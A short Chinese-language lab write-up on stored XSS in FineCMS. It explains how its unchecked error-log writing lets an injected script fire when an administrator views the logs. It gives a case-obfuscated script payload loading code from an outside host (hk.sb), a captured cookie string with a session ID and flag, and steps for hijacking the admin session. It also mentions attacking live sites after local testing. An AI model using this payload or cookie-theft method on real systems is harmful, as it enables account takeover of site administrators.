XSS平台的利用:
借Cookie => 读取Cookie发送出来 (ajax异步传输 )发送方要能找到(公网IP)
XSS平台:前辈把会用到的JS代码做成了集成(拿cookie 不安全)
存储型XSS就是将恶意的代码插入之后,会被保存到服务器中,数据库或者是日志,只要被保存下来,当管理员查看后,恶意代码就会被执行,从而达到想要的目的。
靶场实操
首先先了解一下FineCMS

这个CMS源码开放,可以下载到本地,对源码进行分析,然后在本地进行操作测试之后,在对线上进行攻击
回到靶场,这个CMS中有一个write_log
的函数,因为改CMS没有对错误日志的写入进行检查,通过构造URL,让后台产生错误日志,导致攻击语句出现在错误日志里,当管理员查看后台错误日志的时候,就会触发XSS
c=mail&m=<sCRiPt sRC=//hk.sb/cv1j></sCrIpT>


进入后台,admin.php,实际操作当中可以用后台扫描工具获得后台目录

8b0cba072045805256806b2b24239ded_ci_session=0n6oouv6kd9emokau453lqq0058nm5bu; member_cookie=d256812b83f3751716e6; member_uid=1; flag=zKaQ-01sdfDCo0; 8b0cba072045805256806b2b24239ded_ci_session=k5jj94bm15d75lrr9et5vqat9rartca5
通过修改cookie进入网站后台

查看错误日志

Comments NOTHING